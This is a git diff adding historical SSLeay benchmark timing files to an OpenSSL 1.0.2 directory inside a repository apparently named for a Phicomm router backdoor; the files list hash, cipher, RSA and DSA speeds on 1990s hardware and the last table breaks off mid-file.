diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/586p-100.lnx b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/586p-100.lnx
new file mode 100644
index 0000000..a5488b6
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/586p-100.lnx
@@ -0,0 +1,26 @@
+Pentium 100 - Linux 1.2.13 - gcc 2.7.2p
+This is the pentium specific version of gcc
+
+SSLeay 0.6.4 20-Aug-1996
+built on Thu Aug 22 08:27:58 EST 1996
+options:bn(64,32) md2(char) rc4(idx,int) des(idx,long) idea(int)
+C flags:gcc -DL_ENDIAN -DTERMIOS -O6 -fomit-frame-pointer -mpentium -Wall
+The 'numbers' are in 1000s of bytes per second processed.
+type           8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2             74.90k      208.43k      282.11k      309.59k      318.43k
+md5            807.08k     4205.67k     7801.51k     9958.06k    10810.71k
+sha            405.98k     1821.55k     3119.10k     3799.04k     4052.31k
+sha1           389.13k     1699.50k     2852.78k     3437.57k     3656.36k
+rc4           3621.15k     4130.07k     4212.74k     4228.44k     4213.42k
+des cfb        794.39k      828.37k      831.74k      832.51k      832.85k
+des cbc        817.68k      886.17k      894.72k      896.00k      892.93k
+des ede3       308.83k      323.29k      324.61k      324.95k      324.95k
+idea cfb       690.41k      715.39k      718.51k      719.19k      718.17k
+idea cbc       696.80k      760.60k      767.32k      768.68k      770.05k
+rc2 cfb        619.91k      639.74k      642.30k      642.73k      641.71k
+rc2 cbc        631.99k      671.42k      676.35k      676.18k      677.21k
+rsa  512 bits   0.025s
+rsa 1024 bits   0.123s
+rsa 2048 bits   0.756s
+rsa 4096 bits   5.365s
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/686-200.bsd b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/686-200.bsd
new file mode 100644
index 0000000..f23c580
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/686-200.bsd
@@ -0,0 +1,25 @@
+Pentium Pro 200mhz
+FreeBSD 2.1.5
+gcc 2.7.2.2
+
+SSLeay 0.7.0 30-Jan-1997
+built on Tue Apr 22 12:14:36 EST 1997
+options:bn(64,32) md2(int) rc4(idx,int) des(ptr,risc1,16,long) idea(int) blowfish(ptr2)
+C flags:gcc -DTERMIOS -D_ANSI_SOURCE -fomit-frame-pointer -O3 -m486 -Wall
+The 'numbers' are in 1000s of bytes per second processed.
+type              8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2               130.99k      367.68k      499.09k      547.04k      566.50k
+md5              1924.98k     8293.50k    13464.41k    16010.39k    16820.68k
+sha              1250.75k     5330.43k     8636.88k    10227.36k    10779.14k
+sha1             1071.55k     4572.50k     7459.98k     8791.96k     9341.61k
+rc4             10724.22k    14546.25k    15240.18k    15259.50k    15265.63k
+des cbc          3309.11k     3883.01k     3968.25k     3971.86k     3979.14k
+des ede3         1442.98k     1548.33k     1562.48k     1562.00k     1563.33k
+idea cbc         2195.69k     2506.39k     2529.59k     2545.66k     2546.54k
+rc2 cbc           806.00k      833.52k      837.58k      838.52k      836.69k
+blowfish cbc     4687.34k     5949.97k     6182.43k     6248.11k     6226.09k
+rsa  512 bits   0.010s
+rsa 1024 bits   0.045s
+rsa 2048 bits   0.260s
+rsa 4096 bits   1.690s
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/686-200.lnx b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/686-200.lnx
new file mode 100644
index 0000000..30d14d0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/686-200.lnx
@@ -0,0 +1,26 @@
+SSLeay 0.8.2a 04-Sep-1997
+built on Fri Sep  5 17:37:05 EST 1997
+options:bn(64,32) md2(int) rc4(idx,int) des(ptr,risc1,16,long) idea(int) blowfish(ptr2) C flags:gcc -DL_ENDIAN -DTERMIOS -O3 -fomit-frame-pointer -m486 -Wall -Wuninitialized
+The 'numbers' are in 1000s of bytes per second processed.
+type              8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2               131.02k      368.41k      500.57k      549.21k      566.09k
+mdc2              535.60k      589.10k      595.88k      595.97k      594.54k
+md5              1801.53k     9674.77k    17484.03k    21849.43k    23592.96k
+sha              1261.63k     5533.25k     9285.63k    11187.88k    11913.90k
+sha1             1103.13k     4782.53k     7933.78k     9472.34k    10070.70k
+rc4             10722.53k    14443.93k    15215.79k    15299.24k    15219.59k
+des cbc          3286.57k     3827.73k     3913.39k     3931.82k     3926.70k
+des ede3         1443.50k     1549.08k     1561.17k     1566.38k     1564.67k
+idea cbc         2203.64k     2508.16k     2538.33k     2543.62k     2547.71k
+rc2 cbc          1430.94k     1511.59k     1524.82k     1527.13k     1523.33k
+blowfish cbc     4716.07k     5965.82k     6190.17k     6243.67k     6234.11k
+                  sign    verify
+rsa  512 bits   0.0100s   0.0011s
+rsa 1024 bits   0.0451s   0.0012s
+rsa 2048 bits   0.2605s   0.0086s
+rsa 4096 bits   1.6883s   0.0302s
+                  sign    verify
+dsa  512 bits   0.0083s   0.0156s
+dsa 1024 bits   0.0228s   0.0454s
+dsa 2048 bits   0.0719s   0.1446s
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/686-200.nt b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/686-200.nt
new file mode 100644
index 0000000..c8cbaa0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/686-200.nt
@@ -0,0 +1,24 @@
+built on Tue May 13 08:24:51 EST 1997
+options:bn(64,32) md2(char) rc4(idx,int) des(ptr,risc1,16,long) idea(int) blowfi
+sh(ptr2)
+C flags not available
+The 'numbers' are in 1000s of bytes per second processed.
+type              8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2               156.39k      427.99k      576.14k      628.36k      647.27k
+md5              2120.48k    10255.02k    18396.07k    22795.13k    24244.53k
+sha              1468.59k     6388.89k    10686.12k    12826.62k    13640.01k
+sha1             1393.46k     6013.34k     9974.56k    11932.59k    12633.45k
+rc4             13833.46k    19275.29k    20321.24k    20281.93k    20520.08k
+des cbc          3382.50k     4104.02k     4152.78k     4194.30k     4194.30k
+des ede3         1465.51k     1533.00k     1549.96k     1553.29k     1570.29k
+idea cbc         2579.52k     3079.52k     3130.08k     3153.61k     3106.89k
+rc2 cbc          1204.57k     1276.42k     1285.81k     1289.76k     1285.81k
+blowfish cbc     5229.81k     6374.32k     6574.14k     6574.14k     6594.82k
+rsa  512 bits   0.008s   0.001
+rsa 1024 bits   0.038s   0.001
+rsa 2048 bits   0.231s   0.008
+rsa 4096 bits   1.540s   0.027
+dsa  512 bits   0.007s   0.013
+dsa 1024 bits   0.021s   0.040
+dsa 2048 bits   0.066s   0.130
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/L1 b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/L1
new file mode 100644
index 0000000..ebadf7b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/L1
@@ -0,0 +1,27 @@
+SSLeay 0.8.3ad 27-Oct-1997
+built on Wed Oct 29 00:36:17 EST 1997
+options:bn(64,32) md2(int) rc4(idx,int) des(ptr,risc1,16,long) idea(int) blowfish(ptr2) 
+C flags:gcc -DL_ENDIAN -DTERMIOS -DBN_ASM -O3 -fomit-frame-pointer -m486 -Wall -Wuninitialized -DMD5_ASM -DSHA1_ASM
+The 'numbers' are in 1000s of bytes per second processed.
+type              8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2                56.16k      156.50k      211.46k      231.77k      238.71k
+mdc2              183.37k      205.21k      205.57k      209.92k      207.53k
+md5              1003.65k     5605.56k    11628.54k    15887.70k    17522.69k
+hmac(md5)         411.24k     2803.46k     7616.94k    13475.84k    16864.60k
+sha1              542.66k     2843.50k     5320.53k     6833.49k     7389.18k
+rc4              3677.15k     4313.73k     4407.89k     4429.82k     4404.57k
+des cbc          1787.94k     2174.51k     2236.76k     2249.73k     2230.95k
+des ede3          719.46k      777.26k      784.81k      780.29k      783.70k
+idea cbc          619.56k      677.89k      684.12k      685.40k      685.40k
+rc2 cbc           537.51k      573.93k      578.47k      579.24k      578.90k
+blowfish cbc     3226.76k     4221.65k     4424.19k     4468.39k     4377.26k
+cast cbc         2866.13k     3165.35k     3263.15k     3287.04k     3233.11k
+                  sign    verify
+rsa  512 bits   0.0212s   0.0021s
+rsa 1024 bits   0.1072s   0.0064s
+rsa 2048 bits   0.6853s   0.0222s
+rsa 4096 bits   4.9300s   0.0848s
+                  sign    verify
+dsa  512 bits   0.0200s   0.0380s
+dsa 1024 bits   0.0600s   0.1180s
+dsa 2048 bits   0.2110s   0.4221s
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/R10000.t b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/R10000.t
new file mode 100644
index 0000000..6b3874c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/R10000.t
@@ -0,0 +1,24 @@
+IRIX 6.2 - R10000 195mhz
+SLeay 0.6.5a 06-Dec-1996
+built on Tue Dec 24 03:51:45 EST 1996
+options:bn(32,32) md2(int) rc4(ptr,int) des(ptr,risc2,16,long) idea(int)
+C flags:cc -O2 -DTERMIOS -DB_ENDIAN
+The 'numbers' are in 1000s of bytes per second processed.
+type           8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2            156.34k      424.03k      571.88k      628.88k      646.01k
+md5           1885.02k     8181.72k    13440.53k    16020.60k    16947.54k
+sha           1587.12k     7022.05k    11951.24k    14440.12k    15462.74k
+sha1          1413.13k     6215.86k    10571.16k    12736.22k    13628.51k
+rc4          10556.28k    11974.08k    12077.10k    12111.38k    12103.20k
+des cfb       2977.71k     3252.27k     3284.36k     3302.66k     3290.54k
+des cbc       3298.31k     3704.96k     3771.30k     3730.73k     3778.80k
+des ede3      1278.28k     1328.82k     1342.66k     1339.82k     1343.27k
+idea cfb      2843.34k     3138.04k     3180.95k     3176.46k     3188.54k
+idea cbc      3115.21k     3558.03k     3590.61k     3591.24k     3601.18k
+rc2 cfb       2006.66k     2133.33k     2149.03k     2159.36k     2149.71k
+rc2 cbc       2167.07k     2315.30k     2338.05k     2329.34k     2333.90k
+rsa  512 bits   0.008s
+rsa 1024 bits   0.043s
+rsa 2048 bits   0.280s
+rsa 4096 bits   2.064s
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/R4400.t b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/R4400.t
new file mode 100644
index 0000000..af8848f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/R4400.t
@@ -0,0 +1,26 @@
+IRIX 5.3
+R4400 200mhz
+cc -O2
+SSLeay 0.6.5a 06-Dec-1996
+built on Mon Dec 23 11:51:11 EST 1996
+options:bn(32,32) md2(int) rc4(ptr,int) des(ptr,risc2,16,long) idea(int)
+C flags:cc -O2 -DTERMIOS -DB_ENDIAN
+The 'numbers' are in 1000s of bytes per second processed.
+type           8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2            100.62k      280.25k      380.15k      416.02k      428.82k
+md5            828.62k     3525.05k     6311.98k     7742.51k     8328.04k
+sha            580.04k     2513.74k     4251.73k     5101.04k     5394.80k
+sha1           520.23k     2382.94k     4107.82k     5024.62k     5362.56k
+rc4           5871.53k     6323.08k     6357.49k     6392.04k     6305.45k
+des cfb       1016.76k     1156.72k     1176.59k     1180.55k     1181.65k
+des cbc       1016.38k     1303.81k     1349.10k     1359.41k     1356.62k
+des ede3       607.39k      650.74k      655.11k      657.52k      654.18k
+idea cfb      1296.10k     1348.66k     1353.80k     1358.75k     1355.40k
+idea cbc      1453.90k     1554.68k     1567.84k     1569.89k     1573.57k
+rc2 cfb       1199.86k     1251.69k     1253.57k     1259.56k     1251.31k
+rc2 cbc       1334.60k     1428.55k     1441.89k     1445.42k     1441.45k
+rsa  512 bits   0.024s
+rsa 1024 bits   0.125s
+rsa 2048 bits   0.806s
+rsa 4096 bits   5.800s
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/aix.t b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/aix.t
new file mode 100644
index 0000000..4f24e39
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/aix.t
@@ -0,0 +1,34 @@
+from Paco Garcia <pgarcia@ctv.es>
+This machine is a Bull Estrella  Minitower Model MT604-100
+Processor        : PPC604 
+P.Speed          : 100Mhz 
+Data/Instr Cache :    16 K
+L2 Cache         :   256 K
+PCI BUS Speed    :    33 Mhz
+TransfRate PCI   :   132 MB/s
+Memory           :    96 MB
+
+AIX 4.1.4
+
+SSLeay 0.6.6 14-Jan-1997
+built on Mon Jan 13 21:36:03 CUT 1997
+options:bn(64,32) md2(int) rc4(ptr,char) des(idx,cisc,4,long) idea(int) blowfish
+(idx)
+C flags:cc -O -DAIX -DB_ENDIAN
+The 'numbers' are in 1000s of bytes per second processed.
+type              8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2                53.83k      147.46k      197.63k      215.72k     221.70k
+md5              1278.13k     5354.77k     8679.60k    10195.09k   10780.56k
+sha              1055.34k     4600.37k     7721.30k     9298.94k    9868.63k
+sha1              276.90k     1270.25k     2187.95k     2666.84k    2850.82k
+rc4              4660.57k     5268.93k     5332.48k     5362.47k    5346.65k
+des cbc          1774.16k     1981.10k     1979.56k     2032.71k    1972.25k
+des ede3          748.81k      781.42k      785.66k      785.75k     780.84k
+idea cbc         2066.19k     2329.58k     2378.91k     2379.86k    2380.89k
+rc2 cbc          1278.53k     1379.69k     1389.99k     1393.66k    1389.91k
+blowfish cbc     2812.91k     3307.90k     3364.91k     3386.37k    3374.32k
+rsa  512 bits   0.019s
+rsa 1024 bits   0.096s
+rsa 2048 bits   0.614s
+rsa 4096 bits   4.433s
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/aixold.t b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/aixold.t
new file mode 100644
index 0000000..0b51412
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/aixold.t
@@ -0,0 +1,23 @@
+SSLeay 0.7.3r 20-May-1997
+built on Mon Jun  2 04:06:32 EST 1997
+options:bn(64,32) md2(int) rc4(ptr,char) des(idx,cisc,4,long) idea(int) blowfish(idx)
+C flags:cc -O -DAIX -DB_ENDIAN
+The 'numbers' are in 1000s of bytes per second processed.
+type              8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2                19.09k       52.47k       71.23k       77.49k       78.93k
+md5               214.56k      941.21k     1585.43k     1883.12k     1988.70k
+sha               118.35k      521.65k      860.28k     1042.27k     1100.46k
+sha1              109.52k      478.98k      825.90k      995.48k     1049.69k
+rc4              1263.63k     1494.24k     1545.70k     1521.66k     1518.99k
+des cbc           259.62k      286.55k      287.15k      288.15k      289.45k
+des ede3          104.92k      107.88k      109.27k      109.25k      109.96k
+idea cbc          291.63k      320.07k      319.40k      320.51k      318.27k
+rc2 cbc           220.04k      237.76k      241.44k      245.90k      244.08k
+blowfish cbc      407.95k      474.83k      480.99k      485.71k      481.07k
+rsa  512 bits   0.157s   0.019
+rsa 1024 bits   0.908s   0.023
+rsa 2048 bits   6.225s   0.218
+rsa 4096 bits  46.500s   0.830
+dsa  512 bits   0.159s   0.312
+dsa 1024 bits   0.536s   1.057
+dsa 2048 bits   1.970s   3.977
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/alpha.t b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/alpha.t
new file mode 100644
index 0000000..3a7c6c4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/alpha.t
@@ -0,0 +1,81 @@
+SSLeay-051 Alpha gcc -O3 64Bit (assember bn_mul)
+type           8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2             44.40k      121.56k      162.73k      179.20k      185.01k
+md5            780.85k     3278.53k     5281.52k     6327.98k     6684.67k
+sha            501.40k     2249.19k     3855.27k     4801.19k     5160.96k
+sha-1          384.99k     1759.72k     3113.64k     3946.92k     4229.80k
+rc4           3505.05k     3724.54k     3723.78k     3555.33k     3694.68k
+des cfb        946.96k     1015.27k     1021.87k     1033.56k     1037.65k
+des cbc       1001.24k     1220.20k     1243.31k     1272.73k     1265.87k
+des ede3       445.34k      491.65k      500.53k      502.10k      502.44k
+idea cfb       643.53k      667.49k      663.81k      666.28k      664.51k
+idea cbc       650.42k      735.41k      733.27k      742.74k      745.47k
+rsa  512 bits   0.031s
+rsa 1024 bits   0.141s
+rsa 2048 bits   0.844s
+rsa 4096 bits   6.033s
+
+SSLeay-051 Alpha cc -O2 64bit (assember bn_mul)
+type           8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2             45.37k      122.86k      165.97k      182.95k      188.42k
+md5            842.42k     3629.93k     5916.76k     7039.17k     7364.61k
+sha            498.93k     2197.23k     3895.60k     4756.48k     5132.13k
+sha-1          382.02k     1757.21k     3112.53k     3865.23k     4128.77k
+rc4           2975.25k     3049.33k     3180.97k     3214.68k     3424.26k
+des cfb        901.55k      990.83k     1006.08k     1011.19k     1004.89k
+des cbc        947.84k     1127.84k     1163.67k     1162.24k     1157.80k
+des ede3       435.62k      485.57k      493.67k      491.52k      491.52k
+idea cfb       629.31k      648.66k      647.77k      648.53k      649.90k
+idea cbc       565.15k      608.00k      613.46k      613.38k      617.13k
+rsa  512 bits   0.030s
+rsa 1024 bits   0.141s
+rsa 2048 bits   0.854s
+rsa 4096 bits   6.067s
+
+des cfb        718.28k      822.64k      833.11k      836.27k      841.05k
+des cbc        806.10k      951.42k      975.83k      983.73k      991.23k
+des ede3       329.50k      379.11k      387.95k      387.41k      388.33k
+
+des cfb        871.62k      948.65k      951.81k      953.00k      955.58k
+des cbc        953.60k     1174.27k     1206.70k     1216.10k     1216.44k
+des ede3       349.34k      418.05k      427.26k      429.74k      431.45k
+
+
+
+
+SSLeay-045c Alpha gcc -O3 64Bit
+type           8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2             44.95k      122.22k      164.27k      180.62k      184.66k
+md5            808.71k     3371.95k     5415.68k     6385.66k     6684.67k
+sha            493.68k     2162.05k     3725.82k     4552.02k     4838.74k
+rc4           3317.32k     3649.09k     3728.30k     3744.09k     3691.86k
+cfb des        996.45k     1050.77k     1058.30k     1059.16k     1064.96k
+cbc des       1096.52k     1255.49k     1282.13k     1289.90k     1299.80k
+ede3 des       482.14k      513.51k      518.66k      520.19k      521.39k
+cfb idea       519.90k      533.40k      535.21k      535.55k      535.21k
+cbc idea       619.34k      682.21k      688.04k      689.15k      690.86k
+rsa  512 bits   0.050s
+rsa 1024 bits   0.279s
+rsa 2048 bits   1.908s
+rsa 4096 bits  14.750s
+
+type           8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2             37.31k      102.77k      137.64k      151.55k      155.78k
+md5            516.65k     2535.21k     4655.72k     5859.66k     6343.34k
+rc4           3519.61k     3707.01k     3746.86k     3755.39k     3675.48k
+cfb des        780.27k      894.68k      913.10k      921.26k      922.97k
+cbc des        867.54k     1040.13k     1074.17k     1075.54k     1084.07k
+ede3 des       357.19k      397.36k      398.08k      402.28k      401.41k
+cbc idea       646.53k      686.44k      694.03k      691.20k      693.59k
+rsa  512 bits   0.046s
+rsa 1024 bits   0.270s
+rsa 2048 bits   1.858s
+rsa 4096 bits  14.350s
+
+md2      C      37.83k      103.17k      137.90k      150.87k      155.37k
+md2      L      37.30k      102.04k      139.01k      152.74k      155.78k
+rc4       I   3532.24k     3718.08k     3750.83k     3768.78k     3694.59k
+rc4      CI   2662.97k     2873.26k     2907.22k     2920.63k     2886.31k
+rc4      LI   3514.63k     3738.72k     3747.41k     3752.96k     3708.49k
+cbc idea S     619.01k      658.68k      661.50k      662.53k      663.55k
+cbc idea  L    645.69k      684.22k      694.55k      692.57k      690.86k
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/alpha400.t b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/alpha400.t
new file mode 100644
index 0000000..079e0d1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/alpha400.t
@@ -0,0 +1,25 @@
+Alpha EV5.6 (21164A) 400mhz
+
+SSLeay 0.7.3r 20-May-1997
+built on Mon Jun  2 03:39:58 EST 1997
+options:bn(64,64) md2(int) rc4(ptr,int) des(idx,cisc,4,long) idea(int) blowfish(idx)
+C flags:cc -arch host -tune host -fast -std -O4 -inline speed
+The 'numbers' are in 1000s of bytes per second processed.
+type              8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2               274.98k      760.96k     1034.27k     1124.69k     1148.69k
+md5              2524.46k    11602.60k    19838.81k    24075.26k    25745.10k
+sha              1848.46k     8335.66k    14232.49k    17247.91k    18530.30k
+sha1             1639.67k     7336.53k    12371.80k    14807.72k    15870.63k
+rc4             17950.93k    19390.66k    19652.44k    19700.39k    19412.31k
+des cbc          4018.59k     4872.06k     4988.76k     5003.26k     4995.73k
+des ede3         1809.11k     1965.67k     1984.26k     1986.90k     1982.46k
+idea cbc         2848.82k     3204.33k     3250.26k     3257.34k     3260.42k
+rc2 cbc          3766.08k     4349.50k     4432.21k     4448.94k     4448.26k
+blowfish cbc     6694.88k     9042.35k     9486.93k     9598.98k     9624.91k
+rsa  512 bits   0.003s   0.000
+rsa 1024 bits   0.013s   0.000
+rsa 2048 bits   0.081s   0.003
+rsa 4096 bits   0.577s   0.011
+dsa  512 bits   0.003s   0.005
+dsa 1024 bits   0.007s   0.014
+dsa 2048 bits   0.025s   0.050
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/cyrix100.lnx b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/cyrix100.lnx
new file mode 100644
index 0000000..902dab5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/cyrix100.lnx
@@ -0,0 +1,22 @@
+SSLeay 0.6.6 06-Dec-1996
+built on Fri Dec  6 10:05:20 GMT 1996
+options:bn(64,32) md2(char) rc4(idx,int) des(idx,risc,16,long) idea(int)
+C flags:gcc -DL_ENDIAN -DTERMIOS -O3 -fomit-frame-pointer -m486 -Wall -Wuninitialized
+The 'numbers' are in 1000s of bytes per second processed.
+type           8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2             36.77k      102.48k      138.00k      151.57k      155.78k
+md5            513.59k     2577.22k     4623.51k     5768.99k     6214.53k
+sha            259.89k     1105.45k     1814.97k     2156.16k     2292.13k
+sha1           242.43k     1040.95k     1719.44k     2049.74k     2164.64k
+rc4           1984.48k     2303.41k     2109.37k     2071.47k     1985.61k
+des cfb        712.08k      758.29k      753.17k      752.06k      748.67k
+des cbc        787.37k      937.64k      956.77k      961.61k      957.54k
+des ede3       353.97k      377.28k      379.99k      379.34k      379.11k
+idea cfb       403.80k      418.50k      416.60k      415.78k      415.03k
+idea cbc       426.54k      466.40k      471.31k      472.67k      473.14k
+rc2 cfb        405.15k      420.05k      418.16k      416.72k      416.36k
+rc2 cbc        428.21k      468.43k      473.09k      472.59k      474.70k
+rsa  512 bits   0.040s
+rsa 1024 bits   0.195s
+rsa 2048 bits   1.201s
+rsa 4096 bits   8.700s
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/dgux-x86.t b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/dgux-x86.t
new file mode 100644
index 0000000..70635c5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/dgux-x86.t
@@ -0,0 +1,23 @@
+version:SSLeay 0.5.2c 15-May-1996
+built Fri Jun 14 19:47:04 EST 1996
+options:bn(LLONG,thirty_two) md2(CHAR) rc4(IDX,int) des(ary,long) idea(int)
+C flags:gcc -O3 -fomit-frame-pointer -DL_ENDIAN
+
+type           8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2            113.86k      316.48k      428.36k      467.63k      481.56k
+md5           1001.99k     5037.99k     9545.94k    12036.95k    11800.38k
+sha            628.77k     2743.48k     5113.42k     6206.99k     6165.42k
+sha1           583.83k     2638.66k     4538.85k     5532.09k     5917.04k
+rc4           5493.27k     6369.39k     6511.30k     6577.83k     6486.73k
+des cfb       1219.01k     1286.06k     1299.33k     1288.87k     1381.72k
+des cbc       1360.58k     1469.04k     1456.96k     1454.08k     1513.57k
+des ede3       544.45k      567.84k      568.99k      570.37k      566.09k
+idea cfb      1012.39k     1056.30k     1063.52k      989.17k      863.24k
+idea cbc       985.36k     1090.44k     1105.92k     1108.65k     1090.17k
+rc2 cfb        963.86k      979.06k      995.30k      937.35k      827.39k
+rc2 cbc        951.72k     1042.11k     1049.60k     1047.21k     1059.11k
+rsa  512 bits   0.032s
+rsa 1024 bits   0.159s
+rsa 2048 bits   1.025s
+rsa 4096 bits   7.270s
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/dgux.t b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/dgux.t
new file mode 100644
index 0000000..c7f7564
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/dgux.t
@@ -0,0 +1,17 @@
+type           8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2             38.54k      106.28k      144.00k      157.46k      161.72k
+md5            323.23k     1471.62k     2546.11k     3100.20k     3309.57k
+rc4        I  1902.74k     2055.20k     2080.42k     2077.88k     2065.46k
+cfb des        456.23k      475.22k      481.79k      488.42k      487.17k
+cbc des        484.30k      537.50k      553.09k      558.08k      558.67k
+ede3 des       199.97k      209.05k      211.03k      211.85k      212.78k
+cbc idea       478.50k      519.33k      523.42k      525.09k      526.44k
+rsa  512 bits   0.159s !RSA_LLONG
+rsa 1024 bits   1.053s
+rsa 2048 bits   7.600s
+rsa 4096 bits  59.760s
+
+md2       C     30.53k       83.58k      112.84k      123.22k      126.24k
+rc4           1844.56k     1975.50k     1997.73k     1994.95k     1984.88k
+rc4       C   1800.09k     1968.85k     1995.20k     1992.36k     1996.80k
+rc4       CI  1830.81k     2035.75k     2067.28k     2070.23k     2062.77k
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/hpux-acc.t b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/hpux-acc.t
new file mode 100644
index 0000000..0c0e936
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/hpux-acc.t
@@ -0,0 +1,25 @@
+HPUX 887
+
+SSLeay 0.7.3r 20-May-1997
+built on Mon Jun  2 02:59:45 EST 1997
+options:bn(32,32) md2(int) rc4(ptr,int) des(ptr,risc1,16,long) idea(int) blowfish(idx)
+C flags:cc -DB_ENDIAN -D_HPUX_SOURCE -Aa -Ae +ESlit +O4 -Wl,-a,archive
+The 'numbers' are in 1000s of bytes per second processed.
+type              8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2                58.99k      166.85k      225.07k      247.21k      253.76k
+md5               639.22k     2726.98k     4477.25k     5312.69k     5605.20k
+sha               381.08k     1661.49k     2793.84k     3368.86k     3581.23k
+sha1              349.54k     1514.56k     2536.63k     3042.59k     3224.39k
+rc4              2891.10k     4238.01k     4464.11k     4532.49k     4545.87k
+des cbc           717.05k      808.76k      820.14k      821.97k      821.96k
+des ede3          288.21k      303.50k      303.69k      305.82k      305.14k
+idea cbc          325.83k      334.36k      335.89k      336.61k      333.43k
+rc2 cbc           793.00k      915.81k      926.69k      933.28k      929.53k
+blowfish cbc     1561.91k     2051.97k     2122.65k     2139.40k     2145.92k
+rsa  512 bits   0.031s   0.004
+rsa 1024 bits   0.164s   0.004
+rsa 2048 bits   1.055s   0.037
+rsa 4096 bits   7.600s   0.137
+dsa  512 bits   0.029s   0.057
+dsa 1024 bits   0.092s   0.177
+dsa 2048 bits   0.325s   0.646
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/hpux-kr.t b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/hpux-kr.t
new file mode 100644
index 0000000..ad4a0ad
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/hpux-kr.t
@@ -0,0 +1,23 @@
+SSLeay 0.7.3r 20-May-1997
+built on Mon Jun  2 02:17:35 EST 1997
+options:bn(32,32) md2(int) rc4(ptr,int) des(ptr,cisc,16,long) idea(int) blowfish(idx)
+C flags:cc -DB_ENDIAN -DNOCONST -DNOPROTO -D_HPUX_SOURCE
+The 'numbers' are in 1000s of bytes per second processed.
+type              8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2                35.30k       98.36k      133.41k      146.34k      150.69k
+md5               391.20k     1737.31k     2796.65k     3313.75k     3503.74k
+sha               189.55k      848.14k     1436.72k     1735.87k     1848.03k
